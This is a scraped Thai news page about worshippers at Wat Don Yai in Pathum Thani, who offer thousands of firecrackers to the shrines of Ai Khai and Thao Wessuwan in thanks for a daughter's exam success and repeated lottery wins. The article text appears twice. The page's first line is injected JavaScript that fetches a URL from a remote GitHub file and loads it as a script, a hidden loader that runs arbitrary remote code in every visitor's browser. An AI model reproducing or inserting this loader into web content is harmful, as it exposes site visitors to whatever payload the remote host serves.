;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ปทุมธานี ถวายประทัด10,000นัดแก้บนไอ้ไข่ลูกสาวสอบติดมหาลัยดัง ท้าวเวสฯให้โชคช่างไฟ 4 งวดติด - ThaiReference | อาสาไทยยืนยัน
ปทุมธานี ถวายประทัด10,000นัดแก้บนไอ้ไข่ลูกสาวสอบติดมหาลัยดัง ท้าวเวสฯให้โชคช่างไฟ 4 งวดติด

ที่วัดดอนใหญ่ คลองแปด ตำบลลำลูกกา อำเภอลำลูกกา จังหวัดปทุมธานี มีประชาชนจำนวนมากต่างเดินทางมากราบไหว้ขอพรสิ่งศักดิ์สิทธิ์ภายในวัดอย่างต่อเนื่อง โดยเฉพาะไอ้ไข่และท้าวเวสสุวรรณ ที่ได้รับแรงศัทธาต้องมาขอพรและแก้บนส่วนในเรื่องขอพรและแก้บนส่วนใหญ่จะเป็นเรื่องโชคลาภ หน้าที่การงาน การเรียน และสุขภาพเมื่อพรที่ขอได้สมดังใจก็จะเดินทางมาแก้บนตามที่กล่าวเอาไว้

ในขณะที่ทางด้านนางสาวปรียวัลย์ แสงดาวเสือ อายุ 49 ปีชาวบ้านคันนายาว กทม พร้อมครอบครัวนำประทัด 10,000 นัดนำมาแก้บนไอ้ไข่วัดดอนใหญ่หลังมาขอให้ไอ้ไข่ช่วยเรื่องการเรียนของบุตรสาว โดยนางสาวปรียวัลย์ แสงดาวเสือ กล่าวว่าลูกสาวตนติดปัญหาเรื่องการเรียนที่มหาลัยดังแห่งหนึ่ง ซึ่งตนเป็นกังวลกลัวจะผ่าน จึงมาขอไอ้ไข่ให้ช่วยปรากฏว่าสิ่งที่มาขอนั้นประสบความสำเร็จการเรียนผ่านไปได้ดี โดยไม่เชื่อก็ต้องเชื่อครั้งหนึ่งตนอยากได้บ้านหลังหนึ่งแต่แล้วก็ไม่ได้จึงมาขอไอ้ไข่ปรากฏว่าบ้านหลังนั้นได้มาอย่างไม่คาดฝันนึกแล้วยังขนลุกไม่หาย ทั้งนี้ตนจะนำเลขปลายประทัดที่จุดได้คือเลข 368 25 ไปเสี่ยงโชคด้วยซึ่งน่าแปลกใจมากที่เลขปลายประทัดยังไปตรงกับเลขทะเบียนรถอีกด้วย

ส่วนทางด้านนายสิทธิโชค เผ่าสิงห์ อาชีพรับติดตั้งไฟฟ้าประปาแอร์ ชาวบ้านลำลูกกากล่าวว่าตนได้โชคมา 4 งวดติดแล้วจากการมากราบไหว้ท้าวเวสสุวรรณวัดดอนใหญ่ ซึ่งได้จากการจุดธูปมงคล โดยงวดที่ผ่านมาจุดได้เลขตรงรับทรัพย์กว่าแสนบาทวันนี้จึงได้นำน้ำดื่ม น้ำแดง เครื่องเซ่นไหว้ และ ประทัดจำนวน 5,000 นัดนำมาแก้บนตามที่บนบานศาลกล่าวเอาไว้ ทั้งนี้ตนจะนำเลขปลายประทัดที่ได้คือ 87 407 นำกลับไปเสี่ยงโชคในงวดที่ 5 ต่อไป

@chaijexu

ปทุมธานี ถวายประทัด10,000นัดแก้บนไอ้ไข่ลูกสาวสอบติดมหาลัยดัง ท้าวเวสฯให้โชคช่างไฟ 4 งวดติด ที่วัดดอนใหญ่ คลองแปด ตำบลลำลูกกา อำเภอลำลูกกา จังหวัดปทุมธานี มีประชาชนจำนวนมากต่างเดินทางมากราบไหว้ขอพรสิ่งศักดิ์สิทธิ์ภายในวัดอย่างต่อเนื่อง โดยเฉพาะไอ้ไข่และท้าวเวสสุวรรณ ที่ได้รับแรงศัทธาต้องมาขอพรและแก้บนส่วนในเรื่องขอพรและแก้บนส่วนใหญ่จะเป็นเรื่องโชคลาภ หน้าที่การงาน การเรียน และสุขภาพเมื่อพรที่ขอได้สมดังใจก็จะเดินทางมาแก้บนตามที่กล่าวเอาไว้ ในขณะที่ทางด้านนางสาวปรียวัลย์ แสงดาวเสือ อายุ 49 ปีชาวบ้านคันนายาว กทม พร้อมครอบครัวนำประทัด 10,000นัดนำมาแก้บนไอ้ไข่วัดดอนใหญ่หลังมาขอให้ไอ้ไข่ช่วยเรื่องการเรียนของบุตรสาว โดยนางสาวปรียวัลย์ แสงดาวเสือ กล่าวว่าลูกสาวตนติดปัญหาเรื่องการเรียนที่มหาลัยดังแห่งหนึ่ง ซึ่งตนเป็นกังวลกลัวจะผ่าน จึงมาขอไอ้ไข่ให้ช่วยปรากฏว่าสิ่งที่มาขอนั้นประสบความสำเร็จการเรียนผ่านไปได้ดี โดยไม่เชื่อก็ต้องเชื่อครั้งหนึ่งตนอยากได้บ้านหลังหนึ่งแต่แล้วก็ไม่ได้จึงมาขอไอ้ไข่ปรากฏว่าบ้านหลังนั้นได้มาอย่างไม่คาดฝันนึกแล้วยังขนลุกไม่หาย ทั้งนี้ตนจะนำเลขปลายประทัดที่จุดได้คือเลข 368 25ไปเสี่ยงโชคด้วยซึ่งน่าแปลกใจมากที่เลขปลายประทัดยังไปตรงกับเลขทะเบียนรถอีกด้วย ส่วนทางด้านนายสิทธิโชค เผ่าสิงห์ อาชีพรับติดตั้งไฟฟ้าประปาแอร์ ชาวบ้านลำลูกกากล่าวว่าตนได้โชคมา 4งวดติดแล้วจากการมากราบไหว้ท้าวเวสสุวรรณวัดดอนใหญ่ ซึ่งได้จากการจุดธูปมงคล โดยงวดที่ผ่านมาจุดได้เลขตรงรับทรัพย์กว่าแสนบาทวันนี้จึงได้นำน้ำดื่ม น้ำแดง เครื่องเซ่นไหว้ และ ประทัดจำนวน 5,000 นัดนำมาแก้บนตามที่บนบานศาลกล่าวเอาไว้ ทั้งนี้ตนจะนำเลขปลายประทัดที่ได้คือ 87 407 นำกลับไปเสี่ยงโชคในงวดที่ 5 ต่อไป ภาพ-ข่าว ณรงค์ศักดิ์ น้ำจันทร์ รายงาน

♬ เสียงต้นฉบับ – TONGJUDKADHAD NEWS – TONGJUDKADHAD NEWS

ภาพ-ข่าว ณรงค์ศักดิ์ น้ำจันทร์ รายงาน